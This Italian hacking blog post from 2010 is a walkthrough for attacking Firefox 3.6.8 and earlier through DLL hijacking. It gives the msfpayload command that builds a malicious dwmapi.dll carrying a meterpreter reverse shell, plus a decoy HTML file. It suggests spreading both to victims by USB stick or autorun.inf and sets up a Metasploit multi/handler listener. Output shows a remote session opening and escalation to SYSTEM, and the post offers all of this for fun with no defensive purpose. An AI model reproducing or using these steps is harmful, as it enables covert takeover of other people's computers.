ClsHack:Computer Security Blog    

[Metasploit] multi/handler :D

Posted on: 30 August 2010

Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.

In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…

Vediamo come attaccare firefox <= 3.6.8 con il DLL Hijacking e multi/handler di metasploit.

[info DLL Hijacking]

La dll che carica firefox all’esecuzione, è:
dwmapi.dll


Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll

Output:
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.1.21

Creiamo la falsa pagina html da far aprire alla vittima:
echo "FUCK" > exploit.html
Copiamo tutto su chiavetta oppure in rete ecc…

Ora prepariamo metasploit :D

sudo ./msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST IP
exploit
Output :
[*] Started reverse handler on 192.168.1.21:4444
[*] Starting the payload handler...

Adesso facciamo aprire alla vittima il file html, contenuto su usb e quant’altro :D
Esempio: autorun.inf
E avremo questo output:

[*] Sending stage (748544 bytes) to 192.168.1.153
[*] Meterpreter session 1 opened (192.168.1.21:4444 -> 192.168.1.153:1095) at Mon Aug 30 16:28:48 +0200 2010
meterpreter>
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Buon divertimento :D

Related posts:

  1. [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
  2. [CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution
  3. Come installare Metasploit Framework su Ubuntu (e derivati)
  4. XSS: MORE POWER WITH Beef and Metasploit
  5. [Samba EXPLOIT]Symlink Traversal (guida metasploit)

This entry was posted on Monday, August 30th, 2010 at 2:45 pm and is filed under GNU/Linux, Hacking, Software. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Tagged with: